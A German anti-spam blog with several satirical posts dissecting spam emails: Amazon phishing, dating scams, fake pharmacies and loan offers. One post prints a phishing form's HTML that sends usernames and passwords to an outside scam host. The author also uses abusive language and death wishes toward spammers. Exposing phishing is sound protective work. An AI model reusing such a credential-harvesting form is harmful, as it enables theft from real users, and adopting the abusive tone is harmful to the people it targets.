Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Screenshot“

Ihr Amazon-Konto wurde ausgesetzt

Mittwoch, 23. März 2016

Und ich habe doch gar keines… 😉

Von: amazon (punkt) powering (at) msg (punkt) afterbuy (punkt) de
An: gammelfleisch (at) tamagothi (punkt) de

Diese Spam geht an alle möglichen aus dem Internet eingesammelten Adressen, und der Spammer fälscht zwar den Absender, ist aber zu doof dazu, es so zu machen, dass der Absender auch wirklich nach Amazon aussieht. Aber zum Ausgleich…

Hallo von Amazon-Sicherheit,

…sieht die Anrede auch nicht ganz so überzeugend aus. 😀

Hier ist eine wichtige Nachricht von Amazon.de. Bitte lesen Sie diese Nachricht sorgfaeltig durch, da sie Ihr Kundenkonto bei Amazon.de betrifft.

Wir ueberpruefen routinemaessig Kundenkonten. Bei der Pruefung Ihres Kundenkontos erhaertete sich leider unser Verdacht, dass ein Unberechtigter Zugriff auf dieses hatte.

Aus diesem Grund haben wir Ihr Kundenkonto voruebergehend gesperrt. Niemand kann derzeit auf Ihr Kundenkonto zugreifen, Sie eingeschlossen.

Oh, wie bitter! Amazon nimmt jetzt wohl auf seiner Website über eine noch völlig unbekannte Schnittstelle den Besuchern Fingerabdrücke ab, und wenn jemand das richtige Passwort eingibt, aber den falschen Fingerabdruck hat, dann wird einfach der Account gesperrt. Und es gibt nur eine einzige Möglichkeit, was man dagegen tun kann:

Um Ihr Kundenkonto zu entsperren, befestigt auf diesem E-Mail [sic!] sie haben das Formular.

Bitte laden Sie das Formular und geben Sie Ihre Daten.

Man muss den Anhang einer E-Mail öffnen, die von Unbekannten mit gefälschtem Absender und voller falscher Behauptungen in recht fragwürdigem Deutsch versendet wurde. Auch, wenn da diesmal keine Schadsoftware dranhängt¹, sondern nur ein krimineller Versuch, an die Passwörter anderer Leute zu kommen, ist das Öffnen von unverabredeten Anhängen in E-Mails immer eine ganz schlechte Idee.

Übrigens sieht das Formular im angehängten HTML-Dokument – was nach der stümperhaft formulierten Phishing-Spam gar nicht zu erwarten war – recht gut aus:

Screenshot der angehängten Phishing-Seite

Das gesamte Design besteht nicht etwa aus Texten, sondern ist ein großes Bild, das bei einem anonym nutzbaren, kostenlosen Bildupload-Dienst hinterlegt wurde. Natürlich habe ich directupload (punkt) net schon mit einer Mail darauf hingewiesen, dass der Dienst von Spammern missbraucht wird und erwarte deshalb eine baldige Löschung dieses Blendwerkes. Leider ist das nur ein Tropfen auf dem heißen Stein; ein neues Bild ist schnell hochgeladen und ein paar Millionen Spams sind schnell versendet, der Schaden wird schnell seine naiven Opfer auf anderem Wege finden. 🙁

Was auch immer man in diesem angehängten HTML-Dokument eingibt, geht nicht etwa zu Amazon, sondern…

<form method="post"
action="http://www.desentupidoraapolinario.com.br/zmd/404.php">
<input
style="top: -83px; height: 17px; left: -949px; width: 223px;"
id="user" name="user" value="" type="text" required/>
<input style="top: -99px; height: 17px; left: -949px; width: 223px;"
id="pass" name="pass" value="" type="password" required/><input
style="top: -123px; height: 20px; left: -890px; width: 165px;"
id="submit" name="submit" value="" type="submit">
</form>

…wird an eine deutlich weniger Vertrauen erweckende Domain gesendet. Aber das ist ja auch gar keine Überraschung, denn es handelt sich um eine Spam.

Und nein: Es kann nicht dazu kommen, dass eine ähnliche Mail einmal „echt“ ist. Solche E-Mails sind immer Phishing-Versuche. Amazon versendet keine E-Mail mit Anhängen, in denen Formulare liegen, in denen der Empfänger sein Passwort eingeben soll, und übrigens auch keine mit Links auf derartige Formulare. Und genau das Gleiche gilt für jeden anderen Anbieter von Webdiensten. Und natürlich auch für jede Bank. Und einfach nur generell. Die einzigen Menschen, die so etwas machen, sind Kriminelle.

Es ist also gar nicht so schwierig, nicht darauf hereinzufallen.

Selbst, wenn man sich einmal unsicher ist, sollte eine E-Mail niemals ein Grund zu panischem Geklicke werden, denn Kriminelle verstehen sich darauf, Menschen zu überrumpeln. Sie leben schließlich davon, dass ihre fiesen Tricks zumindest manchmal funktionieren. Immer vor dem Klick nachdenken. Und im Zweifelsfall einfach rückfragen.

Sobald Sie dies tun, werden Sie Ihr Konto wieder verwenden, um Produkte auf Amazon Europa zu verkaufen!

Freundliche Muller,
Das Amazon Services Team

Freundliche was? :mrgreen:

Wenn Sie solche E-Mails nicht mehr erhalten mцchten, kцnnen Sie sich hier abmelden.

Ist ja schon ein bisschen peinlich, wenn man dabei den Link vergisst, nicht?

Aber der Kriminelle hat seine eigentliche „Botschaft“ ja rübergebracht, und jetzt ist er mit seinen Gedanken schon wieder bei den Nutten, so dass die Sorgfalt für eher formale, unwichtige Dinge eben nachlässt. Wenn man darauf achtet, kann man derartige Fehler in sehr vielen Spams sehen. Wenn sich der Spammer Mühe geben wollte, könnte er ja gleich arbeiten gehen.

© 2016 Amazon.com Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten. Amazon Services Europe S.а r.l. 5 Rue Plaetis L-2338 Luxembourg, Handelsregisternummer Luxemburg: B-93815, Gesellschaftskapital 37.500 EUR, Gewerbelizenznummer: 100416, USt.-Identifikationsnummer Luxemburg: LU 19647148.

Nein, diese Spam wurde von einer dynamischen IP-Adresse eines Kunden bei einem Telekommunikationsanbieter aus Arizona, USA versendet; mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen mit Schadsoftware feindselig übernommenen Rechner, der Teil eines Botnetzes ist. Diese Spam hat niemals einen Server von Amazon gesehen.

Einmal ganz davon abgesehen, dass beanspruchtes „geistiges Eigentum“ für eine automatisch erstellte E-Mail ein geistiger Dünnpfiff ist, auf den kaum noch eine Satire möglich ist. Aber das machen leider nicht nur Spammer, sondern auch andere Idioten.

¹Ich weiß, das hier keine Schadsoftware enthalten ist, weil ich mir den Quelltext des angehängten HTML-Dokumentes angeschaut habe. Es gibt keine andere Möglichkeit, das herauszubekommen. Ein Antivirus-Programm versagt regelmäßig, wenn es mit den neuesten Entwicklungen der Kriminellen konfrontiert ist.

Willst Du meine Mus*** anfassen?

Samstag, 13. Februar 2016

Deine was? Deine Muskelrisse vielleicht? Museumsexemplare wirst du ja wohl nicht haben… :mrgreen:

Hallo!

Dieser „Name“ passt immer.

Ich habe auf Deinem Profil gesehen […]

Auf welchem Profil? Und wer soll das angelegt haben? Ich pflege es nicht, mich auf irgendwelchen Websites von börsennotierten Unternehmen ohne seriöses Geschäftsmodell¹ so weit datenmäßig zu entblößen, dass…

[…] wir wohnen nur 4 Kilometer auseinander!

…jemand dort herausbekommen könnte, wo ich wohne. Aber hey, du hast ja „mein Profil“ angeguckt und da keinen anderen Namen als „Hallo“ gefunden – da ist jedem sofort klar, dass es eine Lüge ist.

Magst mir nicht ne Freundschaftsanfrage stellen und vorbeikommen?

Ich soll Spammer als „Freunde“ bezeichnen? Hey, du bist…

Ich bin grad echt heiss…

…nicht nur „heiß“, du bist schon komplett hirnverbrannt.

Wir kennen uns ja eh vom sehen her, weißt Du noch wer ich bin?

Was könnte ich mal gesehen haben, was mich an den, die oder das AbsenderIn dieses Bullshits erinnert? Ich muss spontan an eine Mülltonne denken.

Schreib mir schnell, ja?
http://www.m3e2a.club/[ID entfernt]/

Schreib mir schnell, aber keine Mail! Stattdessen klick einfach in eine Spam. Dummes Klicken ist das neue „Schreiben“.

Der Link ist mit einer eindeutigen ID vergiftet. Wer darauf klickt, funkt an die Spammer zurück, dass die Spam ankommt und beklickt wird – das ist ein wirksames Mittel gegen Einsamkeit im Postfach, aber leider nicht so wirksam, wenn man auch etwas Erträgliches in seiner Mail haben möchte. Der Link führt nach der üblichen Kaskade von Weiterleitungen – ein direkter Link ist dem Spammer nun einmal zuwider – in die Website in der Domain myfunbook (punkt) net, wo man die aktuellen Designexperimente der Dating-Betrüger bewundern kann. Natürlich gibt es wieder einmal nur Frauen²:

Screenshot der betrügerischen Dating-Site

Ja, eines der von irgendwo aus dem Internet mitgenommenen (und übrigens oft grottenschlecht skalierten) Bilder ist den Verbrechern verloren gegangen. Wie das passieren konnte? Die naheliegendste Erklärung ist: Weil die so sehr damit beschäftigt sind, diese betrügerische Dreckssite von einer Wegwerfdomain in die nächste und von einem Wegwerfserver in den nächsten umzuziehen und das Geld ihrer Opfer im Bordell zu verbraten, haben sie sich natürlich nach dem letzten Umzug noch nicht angeschaut, wie es aussieht. Wenn sie sich Mühe geben würden, könnten sie ja auch arbeiten gehen und brauchten nicht zu spammen.

Was denen, die auf einen solchen Köder hereinfallen, blüht, habe ich schon vor fünf Jahren beschrieben. Es kann gut sein, dass die Methoden inzwischen subtiler sind, aber der Betrug ist der gleiche. Und die Daten, die man auf solchen Seiten eingibt, gehen auch immer noch an richtig üble Verbrecher.

Bis gleich
Hanna

Geh sterben!

Keine Nachrichten mehr von mir?
http://www.m3e2a.club/abm/[ID entfernt]/

Ja, du mich auch!

¹Die Vergällung menschlicher Kommunikation mit Reklame ist kein seriöses Geschäftsmodell und zum Scheitern verurteilt.

²Wegen des klar sexuellen Inhaltes habe ich den Originalgröße-Screenshot bei Flickr als „eingeschränkt“ markiert. Deshalb ist eine Anmeldung an Flickr erforderlich, um ihn zu sehen. Angesichts der geringen Informationsdichte und der dummen Darbietung der Betrugsmasche halte ich diese Einschränkung nicht für einen großen Verlust.

Der Service Ihrer Online Klinik

Donnerstag, 4. Februar 2016

Oh, mit Deppen Leer Zeichen!

Immer wieder erfreulich und erbäulich, wenn sich das Streben nach gestalterischer Exzellenz in der HTML-Formatierung einer Spam mit geistigem Dünnpfiff und sondersamem sprachlichen Ausdruck kombiniert:

Online Klinik -- Der Service Ihrer Online Klinik -- Gewünschte Behandlung wählen -- Medizinische Angaben tätigen -- Behandlung wird per 24h Express versandt -- Unsere Schwerpunkte -- Impotenz: Die wirksamsten Behandlungen für die Potenz [Button: Behandlungen] -- Verhütung: Zuverlässige und beliebte Verhütungsmethoden [Button: Behandlungen] -- Gewichtsreduktion: Gewicht reduzieren mit effektiver Behandlung [Button: Behandlungen] -- Bluthochdruck: Bluthochdruck senken und gesünder leben [Button: Behandlungen] -- Diabetes: Folgerezepte für ihre Diabetes-Behandlung [Button: Behandlungen]

Die Links gehen auf die Website in der Domain interstelle (punkt) eu und führen nach diversen Weiterleitungen zu einer Betrugsapotheke in der Domain www (punkt) 121doc (punkt) de, die außerhalb der Europäischen Union in Guernsey verwaltet wird (die weiteren Einzelheiten muss jeder selbst bei der DeNIC herausbekommen, ich darf sie hier wegen der DeNIC-Nutzungsbedingungen nicht posten).

Es ist natürlich eine Spam, also funkt das (technisch ansonsten völlig unnötige) Weiterleitungsskript an die Spammer zurück, auf welchen Mailadressen die Spams ankommen, die beklickt werden. Die Spammer werden mit dieser Information etwas anzufangen wissen, was keinem Empfänger gefällt.

Claim aus dem Titel der Website der Betrugsapotheke: 121doc -- Ihre Online Klinik seit 2002Aber von diesen Standardanmerkungen einmal abgesehen: Ich muss den Betrugsapothekern widerwillig zugestehen, dass sie in der optischen und psychologischen Präsentation ihres Betruges ordentlich zugelegt haben – wer einen Eindruck davon bekommen möchte, ohne seine Privatsphäre und seine Computersicherheit aufs Spiel zu setzen: Ich habe einen Screenshot der Sektion mit den Pimmelpillen bei Flickr hochgeladen. Hier hat jemand verstanden, was das Wichtigste am Betrug ist: Dass er für seine Opfer seriös aussieht. Es muss ein sehr erfahrener Betrüger sein…

Wer sich von etwas Design und irgendwo abgeschriebenen Worten verblenden lässt und sich nicht an anderen Stellen über diese „Apotheke“ informiert, kann also sehr leicht darauf hereinfallen.

Was von den „Online-Rezepten“ dieser Betrüger zu halten ist, mit denen sie ihre potenziellen Opfer zu verblenden versuchen, lässt sich im Wiki des Antispam e.V. nachlesen. Wer es ernsthaft für möglich hält, dass man bei einer mit asozialer und illegaler Spam beworbenen Betrugsapotheke richtige Medikamente statt lebensgefährlicher Giftpillen bekommt, der sollte gleich den ganzen Artikel dort lesen! Kurz von mir zusammengefasst: Wenn man darauf reingefallen ist und Glück hat, wird gar nichts geliefert und man bleibt wenigstens am Leben, so dass die angegebenen Daten „nur“ für Betrugsgeschäfte aller Art missbraucht werden und man zwei, drei Jahre immer wieder Polizisten, Ermittlungsrichtern, Staatsanwälten und Inkassobüros in nervenaufreibendem Schriftverkehr erklären „darf“, was es damit auf sich hat und wie es dazu gekommen ist. Wer weniger Glück hat, der bekommt „Medikamente“ geliefert und nimmt sie auch noch ein… 🙁

Bekanntschaft für Sex

Mittwoch, 3. Februar 2016

Screenshot der Spam -- Eine bannerartige Grafik für einen Anbieter, der unter 'sexymaus' firmiert zusammen mit der Aufforderung: 'Finde nette Leute im Live-Chat' -- Darunter eine große Grafik eines Paares in einer Badewanne, die auf mich eher den Eindruck macht, als sollte sie für die Nutzung von Kondomen werben -- Darunter der Link mit dem Linktext: 'GEHEN SIE ZU DEM CHAT'

Immer wieder erstaunlich, dass derartige Anbieter ihre Angebote nur mit illegaler und asozialer Spam loswerden – was ich als deutliches Indiz dafür werte, dass man dort vor allem mit Bots chattet, und zwar vermutlich teuer.

Anders, als das – vom Spammer womöglich von irgendwo, zum Beispiel von einer Kampagne für die Nutzung von Kondomen „mitgenommene“ – Bildmaterial vermuten lässt, geht es beim Klick nicht auf eine Website, die irgendwas mit Sexymaus sein will, sondern auf eine Website in der Domain gmgstat (punkt) co (punkt) ua. Dort gibt es keine Mäuschen und keine Körperflüssigkeiten, sondern nur ein Frameset, in dem dann eine Seite aus der Domain alspa (punkt) info eingebettet wird. Diese Seite wiederum…

Screenshot meines Terminals mit der Ausgabe von lynx -mime_header -dump

…enthält nur einen in Javascript gecodeten Zähler (vermutlich hat der Vollidiot von Spammer noch nicht gehört, wie man mit einem grep über die Logdatei des Webservers und einer Pipe auf wc -l an wesentlich aussagekräftigere Zugriffszahlen für diese Drecksseite kommt) sowie eine Weiterleitung auf eine andere Seite in der gleichen Domain. Im nächsten Schritt kommt es dann endlich zur Weiterleitung auf eine Seite in der Domain sexymaus (punkt) com, natürlich mit angehängtem Affiliate-Link, damit der Spammer von den Betreibern der Domain sexymaus (punkt) com auch schön für seine illegale und asoziale Spam bezahlt wird:

Screenshot meines Terminals mit der Ausgabe von lynx -mime_header -dump

Dieser Spammer ist also ganz schön verschroben, wenn er sein eigentliches Geschäft zu verbergen sucht.

Den Betreibern der Domain sexymaus (punkt) com, die im Moment aktiv illegale und asoziale Spamwerbung finanzieren, lege ich nahe, anhand der in den Screenshots sichtbaren Affiliate-IDs ihre Verträge mit diesen Spammern zu beenden und Schadenersatz zu fordern, und zwar wegen der Anwendung illegaler Methoden, der damit verbundenen Beschädigung der Reputation und des Vertrauensbruchs fristlos. So lange sie das nicht tun, sind sie nämlich selbst die Spam. Und wer will schon gern mit Spam chatten? :mrgreen:

Ach ja, warum ich das hier schreibe und nicht direkt an die Betreiber?

Ich hätte es wirklich gern an die Betreiber der Website unter sexymaus (punkt) com gemailt, aber leider zeigt mir diese mit illegaler und asozialer Spam beworbene Website ohne aktiviertes Javascript nichts an, so dass ich nicht an ein Impressum kommen kann. Und ich bin doch kein Idiot, dass ich angesichts der gegenwärtigen Kriminalität im Internet einer mit Spam beworbenen Website das Ausführen von Javascript in meinem Browser auf meinem Computer erlaube! Davon würde ich auch jedem anderen abraten.

Große rote Edelrose von Rosenbote

Freitag, 29. Januar 2016

Diese Spam eines Affiliate-Partners¹ eines deutschen Versenders ist eine Nichtkaufempfehlung, und wenn man mich danach fragt, sogar eine Niemalskaufempfehlung:

Screenshot meines Mailclients. Eine große grafische Reklame mit einem Bild einer Rose und der werbenden Aufforderung 'Verschenken Sie Freude! z.B. große rote Rose, nur 9,90€ inklusive Grußkarte, Riesenblüte, rosenbote.de

Die 233,1 KiB unverlangt zugestellten, „freudigen“ JPEG-Anhanges, die durch die Base-64-Codierung in der Mail übrigens zu rd. 300 KiB Datenmüll-Stopfmasse aufgeplustert sind, wurden mir mutmaßlich von einem „Geschäftspartner“ der Klitsche mit der in der Grafik angegebenen URL als Spam in das Postfach gemacht – und das Wort mutmaßlich steht hier nur, um die Hure Justitia zu besänftigen, denn ich kann mir beim besten Willen zurzeit keinen Grund vorstellen, warum jemand anders einen mir zuvor völlig unbekannten Blumenverhökerer mit einer derartigen illegalen und grenzkriminellen „Werbeaktion“ neue Kunden zutreiben sollte.

Nun, wer illegale und asoziale Spam für eine „Freude“ hält, der darf gern den illegal und asozial vorgehenden Spammern ihre stinkenden Geschäfte ermöglichen. Andere Menschen mit einem anderen Begriff von „Freude“ werden sich hoffentlich für lange Zeit merken (und das auch nach Möglichkeit gern und häufig weitersagen), dass die Rosen doch lieber an einem anderen Ort als ausgerechnet beim Spammerfinanzierer rosenbote (punkt) de gekauft werden sollten. Denn Spam ist immer ein ganz schlechtes Zeichen, das mindestens darauf hindeutet, dass jemandem sowohl seine Legalität als auch seine Reputation völlig egal sind. Welche Erfahrungen man mit solchen Gestalten erwarteterweise machen wird, lässt sich durch Benutzung eines handelsüblichen Gehirnes schon mittlerer Leistungsfähigkeit bereits im Vorfeld abschätzen.

¹Die über einen Wust von zwei Weiterleitungs-Skripten angehängte Affiliate-ID lautet übrigens: belboon=03898e092c8d01f913003ce1,4465685, – nur für den Fall, dass dieser Versender doch Wert auf seine Reputation legt. Die Verwendung solcher Praktiken sollte eine fristlose Kündigung jedes Vertrages ermöglichen.

Article inquiry on http://www.tamagothi.de/

Montag, 25. Januar 2016

HI team at Tamagothi.de

Das ist genau mein Name, Bruder Dörrkopf! Wie ich wirklich heiße, ist auf der Seite, mit der du deine Geschäftchen machen willst, eher schwierig zu übersehen. :mrgreen:

How are you?

Ach, danke der Nachfrage, es geht mir eigentlich ganz gut. Ich habe nur so ein akutes Übelkeitsgefühl wegen der Spam, die du mir direkt ins Honigtöpfchen gemacht hast.

I came across your excellent German site: http://www.tamagothi.de/

How much would it be for an article placement with a do-follow link to a leading German finance/trading site in the main content area of an article, taking into account the 3 points below:

· We will get the German content written, which will be written by one of our high quality German writers. The content will beunique and definitely fit the nature of your site.

· The article is not marked as sponsored and will stay on the site permanently even if it rolls over into the archives.

· We will pay you via Paypal once the article is live.

Zunächst hättest du auf der von dir so umworbenen Website leicht einen Eindruck davon verschaffen können, wie ich zum Thema „Werbung auf meinen Websites“ stehe. Dass du darüber hinaus auch noch den expliziten Wunsch hast, dass ich meine Leser mit ungekennzeichneter Schleichwerbung verachte, lässt einen so tiefen Blick in deinen vergammelten Charakter zu, dass ich mich mit Grausen und verstärkter Übelkeit davon abwende.

Da brauche ich auch gar nicht mehr darüber nachzudenken, dass ich in der BRD für einen Link auf illegale Angebote haftbar gemacht werde – und hey, Spammer, es handelt sich bei deiner Mail bereits um eine klare Spam an automatisch eingesammeltes Adressmaterial, die als Werbemittel illegal ist. Da kann ich mir gut vorstellen, was verlinkt werden wird: Abzockcasinos, Betrugsapotheken und Markenimitatswebshops.

Please update me with a price and will speak to the suitable clients ASAP.

Wenn du dir etwas kaufen willst, kauf dir einen Lolly! Ein ungekennzeichnetes Podium für deine Schleichwerbung bei mir kriegst du nicht. (Allein schon, weil du auf illegale und asoziale Spam setzt, da brauchst du mich gar nicht mehr eigens dazu auffordern, dass ich meine paar Leser auch noch für eine Handvoll Klimpergroschen verachten soll.)

Thanks so much.

Danke für nichts! Geh einfach sterben, damit du endlich erfreulich tot bist! Dann bedanke ich mich auch.

Regards,

James – Manager

DigitalContentZone

Mit sprudelndem Schwall von frisch Erbrochenem
Nachtwächter – Spamtonnenleerungsobermanager
Inhalte statt Content

PS: Hey, James, du Brechmittel! Dass die von dir verlinkte Website – übrigens in einer über einen Dienstleister aus Florida anonym registrierten Domain – ohne Javascript gar nichts anzeigt, lässt dich keine Spur seriöser wirken. Da hilft es auch nicht, dass man mit Javascript ein Foto von einem Typen mit Schlips sieht…

Screenshot der Website dieser Werbeagentur, die halbseidene und leserverachtende Schleichwerbeplätze über illegale und asoziale Spam akquriert.

…der vermutlich etwas seriöser aussieht als du. Moment, aus welcher Domain bettest du die ganzen externen Javascript-Fetzen ein? wixstatic (punkt) com? Mit Verlaub, du Wichser, ich finde, das passt zu dir! :mrgreen:

Ihre Auszahlung

Dienstag, 15. Dezember 2015

Geld? Für mich?

Auszahlung bis 5.000 EUR sichern .

Erhalten Sie unsere Kreditkarte und dazu einen Kreditrahmen von 5.000 EUR:
http://www.weihnachtsgeldsofort.com/[ID entfernt]/

– Keine Ablehnung
– Ohne Schufa
– Auch Barauszahlung
– Versand innerhalb 48 Stunden

Verpasen Sie nicht diese einmalige Chance

Mit freundlichen Gruessen
Martina Malduro
Buchhaltung

Klingt doch eigentlich viel zu toll, als dass es nur mit illegaler und asozialer Spam weggehen würde, oder? Bonität ist irrelevant; jedes Suppenhuhn, das mit abgeschnittenem Kopf noch ein bisschen herumläuft, bekommt ein Darlehen?

Nun, es stimmt ja auch gar nicht, das kopflose Huhn bekommt die Möglichkeit, einen Antrag auf ein Darlehen und auf eine überteuerte „Prepaid-Kreditkarte“ zu stellen, und welchem dieser Anträge positiv beschieden wird, kann sich hoffentlich auch ein bescheidener Geist leicht vorstellen.

Übrigens kann ich nicht anders, als das von widerwärtigen Werbern ersonnene Wort „Prepaid-Kreditkarte“ in Anführungszeichen zu setzen. Nur ein intelligenzverachtendes Loch von Werber kann auf die Idee kommen, den von ihm in ihrer geistigen Leistungsfähigkeit verachteten Leuten zu erzählen, dass er ein Darlehen gewährt, wenn sie das verliehene Geld vorher bei ihm hinterlegen. Das Schlimmste daran ist aber, dass es wirklich Menschen gibt, die so ein hirnloses Werbegebrabbel im Alltag wiederholen…

Jetzt aber wieder zur Spam, die fortsetzt, was menschenverachtende Werber begonnen haben.

Die verlinkte Website bettet die Inhalte eines anderen Anbieters in einem FRAMESET ein und hängt eine Affiliate-ID dran, von dort gibts dann wieder eine HTTP-Weiterleitung zu einem dritten Anbieter, dessen Website in der Domain sofort (punkt) credit liegt. Ärgerlicherweise gibt es für die TLD .credit keinen Whois-Dienst, so dass ich nicht bequem an der Kommandozeile nachschauen kann, wann die Domain registriert wurde und welche Daten dabei angegeben wurden. Aber wer wird sich denn auch für solchen „technischen Kleinkram“ interessieren, wenn es doch nur um ein bisschen Geld geht. Allein auf Grundlage dieser „technischen Kleinigkeit“ einer völligen Intransparenz lasse ich mich zur der Aussage hinreißen, dass es in dieser gesamten Domain keinen einzigen Anbieter geben sollte, der auch nur ein bisschen Wert auf Seriosität legt, während es dort vermutlich etliche Anbieter geben wird, die einen eher „gesenkten“ Wert auf Legalität legen.

So weit, so schlecht. Aber es hilft sehr bei der Beurteilung, wenn die benutzte Domain schon alles sagt.

Die Abzocker-Masche aus dieser Mail ist übrigens nicht neu und hat schon vor zweieinhalb Jahren eine ausführliche „Würdigung“ bekommen, als sie noch mit einer anderen Domain lief. Neu ist hingegen das Design einer Website, die so tut, als gäbe es dort Darlehen (zum Vergrößern klicken):

Screenshot der Abzocker-Website unter sofort.credit

Genießer mögen ihren Spaß mit den irreführenden Formulierungen haben, und andere Menschen mögen nicht auf diese Kombination aus Gimpelfang und Beutelschneiderei reinfallen!

Deutsch Trusted Meds Online

Samstag, 5. Dezember 2015

Oh schön, auf „Deutsch“! 😀

Pull yourself together! Erectile dysfunction is not a death penalty!

Plattdeutsch eben! Aber hey, Spammer: Deine Hirnlosigkeit ist leider auch kein Todesurteil, denn sonst hätten wir alle Ruhe vor dir.

View this email in your browser

So so, ich soll mir also deine Website angucken, weil du in der Mail schon kein HTML kannst. Das klingt nach einem tollen Argument!

Deutsch Trusted Meds Online

Das hast du schon im Betreff gesagt, und da klang es genau so daneben. Na gut, jetzt ist es verlinkt.

Der Link geht übrigens zu Google, weil der Spammer glaubt, dass er damit durch die Spamfilter kommt – und Googles nutzertrackende URL-Weiterleitung wird dann benutzt, um eine Weiterleitung in die Website der Domain zglbk (punkt) firstdrugservice (punkt) ru durchzuführen, wo es eine weitere Weiterleitung in die Website der Domain luckytabsmall (punkt) ru gibt. Die steht wegen exzessiver illegaler Spammerei nicht nur auf so ziemlich jeder Blacklist dieser Welt, sondern hat sich auch im „Web of Trust“ einen beachtlichen Ruf „erarbeitet“. Was man dort, auf der Website einer russischen Domain sieht, ist eine „kanadische Apotheke“ in „deutscher“ Sprache, die eher kein Mittel gegen Kopfschmerzen hat (zum Vergrößern klicken, aber besser keine Getränke im Mund):

Screenshot der betrügerischen Website, die sich mal wieder 'Canadian Pharmacy' nennt

Nun ja, wer da etwas bestellt, hat vielleicht Glück: Wenn nichts geliefert wird, bleibt man wenigstens am Leben. Obwohl…

Set free your desires from now and forever!

…das gar nicht so wichtig ist: Wenn man ersteinmal tot ist, hat man auch all sein Begehr von jetzt an und für alle Zeiten befreit! :mrgreen:

I was ready to give my right arm to get back my former erection!
Ändern Sie Ihr Leben jetzt!

Tja, vom Abhacken des Armes wird er auch nicht wieder steif. Genau so wenig wie von den Angeboten der Spammer.

Deutsch Trusted Meds Online

Es bleibt auch weiterhin so richtig deutsch!

Also we have
– Skin Care
– Men’s Health
– Pain Relief
– Stop Smoking
… and more than 2.000 positions
Just visit our shop!

Wie wäre es mal mit „Stop Spamming“ – ach, das geht nicht, weil die besteste und billigste Apotheke des ganzen Internets niemand nehmen würde, wenn sie nicht spammte? Wie das nur kommt… 😀

Copyright ©insidethestripes.com, All rights reserved.

Diese Spam ist wertvolles „geistiges Eigentum“ eines Domainnamens! :mrgreen:

Verklag mich doch für das Vollzitat deines wertvollen „geistigen Eigentums“, du hirngeschrumpelter Spammer an der Menschheitsverblödungsfront! Los, mach zu! Ich würde dich so gern mal näher kennenlernen… und die Kriminalpolizei hier auch…

Want to change how you receive these emails?
You can update your preferences or unsubscribe from this list

Ach nö, die empfange ich schon ganz richtig, diese Spams. Sie gehen auf meiner Seite direkt in das virtuelle Tönnchen mit dem ganzen kriminellen Glibberzeug. Da muss ich den Verbrechern, die mir so etwas ins Postfach machen, nicht auch noch sagen, dass es ankommt, gelesen wird und beklickt wird.

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.